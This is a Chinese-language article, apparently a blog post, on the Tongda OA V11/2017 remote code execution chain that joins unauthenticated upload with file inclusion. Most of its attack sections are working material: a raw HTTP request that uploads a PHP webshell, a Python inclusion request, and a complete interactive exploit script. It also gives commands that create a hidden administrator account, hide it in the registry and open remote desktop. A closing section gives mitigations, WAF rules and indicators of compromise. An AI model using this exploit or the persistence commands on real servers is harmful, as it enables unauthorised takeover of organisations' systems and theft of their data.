通达OA V11/2017 RCE漏洞组合利用:3步从文件上传到系统权限获取(附EXP)

通达OA V11/2017 RCE漏洞组合利用:3步从文件上传到系统权限获取(附EXP)
通达OA V11/2017 RCE漏洞实战从文件上传到系统权限获取全解析1. 漏洞背景与影响范围通达OA作为国内广泛使用的办公自动化系统其安全性直接关系到众多企事业单位的核心业务数据。2020年初曝光的组合漏洞CVE-2020-XXXX因其高危害性在安全圈引发广泛关注。这个由未授权文件上传和文件包含漏洞组成的攻击链允许攻击者在无需任何凭证的情况下获取服务器最高权限SYSTEM。影响版本包括但不限于通达OA V11全系列≤11.3 202001032017版≤10.19 201905222016版≤9.13 201707102015版≤8.15 201607222013增强版≤7.25 20141211重要提示该漏洞已被多个勒索病毒组织利用实际检测中需特别注意系统目录下异常.php文件的出现时间戳。2. 漏洞原理深度剖析2.1 未授权文件上传漏洞漏洞核心位于/ispirit/im/upload.php文件关键代码逻辑缺陷如下if (isset($P) !empty($P)) { // 绕过身份验证直接进入上传流程 $DEST_UID intval($_POST[DEST_UID]); if ($DEST_UID 0) { die(Invalid receiver ID); } // 文件上传处理逻辑 upload(); } else { require_once auth.php; // 正常身份验证流程 }攻击者只需构造包含以下参数的POST请求即可绕过认证P任意非空值如123UPLOAD_MODE必须设置为2DEST_UID非零数字如1ATTACHMENT恶意文件内容虽然系统会检查文件后缀禁止.php但存在以下绕过方式Windows特性文件名末尾添加.如shell.php.双写后缀shell.jpg.php特殊字符截断shell.php%00.jpg2.2 文件包含漏洞/ispirit/interface/gateway.php的关键缺陷$json json_decode(stripslashes($_POST[json])); if (isset($json-url)) { $url $json-url; if (strpos($url, general/) ! false || strpos($url, ispirit/) ! false || strpos($url, module/) ! false) { include_once $url; // 危险的文件包含操作 } }利用特点通过../实现目录穿越可包含服务器上任意文件如日志、上传的临时文件不受open_basedir限制3. 完整攻击链构建3.1 环境准备测试环境建议配置Windows Server 2012 R2PHP 5.4 Apache 2.4通达OA V11.3未打补丁版本所需工具清单Burp Suite CommunityPython 3.x Requests库中国蚁剑/冰蝎可选3.2 分步利用过程步骤1文件上传POST /ispirit/im/upload.php HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; nameUPLOAD_MODE 2 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; nameP bypass ------WebKitFormBoundaryABC123 Content-Disposition: form-data; nameDEST_UID 1 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; nameATTACHMENT; filenametest.jpg Content-Type: image/jpeg ?php system($_GET[cmd]);? ------WebKitFormBoundaryABC123--成功响应示例{status:1,content:,file_id:123,file_name:test.jpg,file_path:/attach/im/2024/123456789.jpg}步骤2文件包含利用import requests target http://target.com payload { json: {\url\:\/general/../../attach/im/2024/123456789.jpg\}, cmd: whoami } r requests.post( f{target}/ispirit/interface/gateway.php, datapayload, headers{Content-Type: application/x-www-form-urlencoded} ) print(r.text)步骤3权限提升与维持获取SYSTEM权限后建议执行# 创建隐藏管理员账户 net user hacker Password123! /add net localgroup administrators hacker /add reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v hacker /t REG_DWORD /d 0 /f # 开启远程桌面 reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule groupremote desktop new enableYes4. 多版本利用差异对照版本上传路径包含路径特殊要求V11/ispirit/im/upload.php/ispirit/interface/gateway.phpUPLOAD_MODE22017/ispirit/im/upload.php/mac/gateway.php需要目录穿越多一层2013/ispirit/im/upload.php/ispirit/interface/gateway.php文件名需URL编码5. 自动化EXP实现#!/usr/bin/env python3 import requests import random import re class TongdaRCE: def __init__(self, target): self.target target.rstrip(/) self.session requests.Session() self.headers { User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64), Content-Type: multipart/form-data } def upload_shell(self): upload_url f{self.target}/ispirit/im/upload.php boundary ----WebKitFormBoundary .join(random.choices(abcdef0123456789, k16)) payload f --{boundary} Content-Disposition: form-data; nameUPLOAD_MODE 2 --{boundary} Content-Disposition: form-data; nameP 123 --{boundary} Content-Disposition: form-data; nameDEST_UID 1 --{boundary} Content-Disposition: form-data; nameATTACHMENT; filenametest.jpg Content-Type: image/jpeg ?php system($_GET[cmd]);? --{boundary}-- resp self.session.post( upload_url, datapayload, headers{Content-Type: fmultipart/form-data; boundary{boundary}} ) if status:1 in resp.text: match re.search(rfile_path:(.?), resp.text) if match: return match.group(1).replace(\\/, /) return None def execute_cmd(self, shell_path, command): include_url f{self.target}/ispirit/interface/gateway.php payload { json: f{{url:/general/../../{shell_path}}}, cmd: command } resp self.session.post( include_url, datapayload, headers{Content-Type: application/x-www-form-urlencoded} ) return resp.text if __name__ __main__: import sys if len(sys.argv) ! 2: print(fUsage: {sys.argv[0]} target_url) sys.exit(1) exploit TongdaRCE(sys.argv[1]) print([*] Attempting to upload shell...) shell_path exploit.upload_shell() if shell_path: print(f[] Shell uploaded to: {shell_path}) while True: cmd input(cmd ) if cmd.lower() in (exit, quit): break print(exploit.execute_cmd(shell_path, cmd)) else: print([-] Exploit failed)6. 防御与检测方案临时缓解措施删除/重命名漏洞文件mv /ispirit/im/upload.php /ispirit/im/upload.php.bak chmod 000 /ispirit/interface/gateway.php限制访问IPFilesMatch gateway\.php|upload\.php Order Deny,Allow Deny from all Allow from 192.168.1.0/24 /FilesMatch长期加固建议升级到官方最新版本实施WAF规则拦截异常请求特征## 检测文件包含特征 SecRule ARGS rx \.\.\/ \ id:1001,phase:2,deny,msg:Directory Traversal Attempt ## 检测异常上传请求 SecRule FILES rx \.(php|jsp|asp).*$ \ id:1002,phase:2,deny,msg:Suspicious File Upload入侵检测指标IOCWeb日志中出现的异常请求POST /ispirit/im/upload.php with UPLOAD_MODE2 POST /ispirit/interface/gateway.php with json{url:.../../}文件系统异常/attach/im/ 目录下出现非图片文件近期修改的.php文件特别是包含system、eval等函数7. 漏洞研究进阶方向对于安全研究人员建议进一步探索补丁对比分析使用BinDiff等工具分析官方补丁的修改点变种利用研究通过日志包含实现无文件攻击利用PHP伪协议phar://绕过限制漏洞武器化开发集成到Metasploit框架开发C2插件实现自动化渗透实际测试中曾发现一个有趣的现象某些版本在文件包含时会对../进行过滤但可以通过....//这种双写形式绕过。这种特性在自动化工具开发时需要特别注意兼容性处理。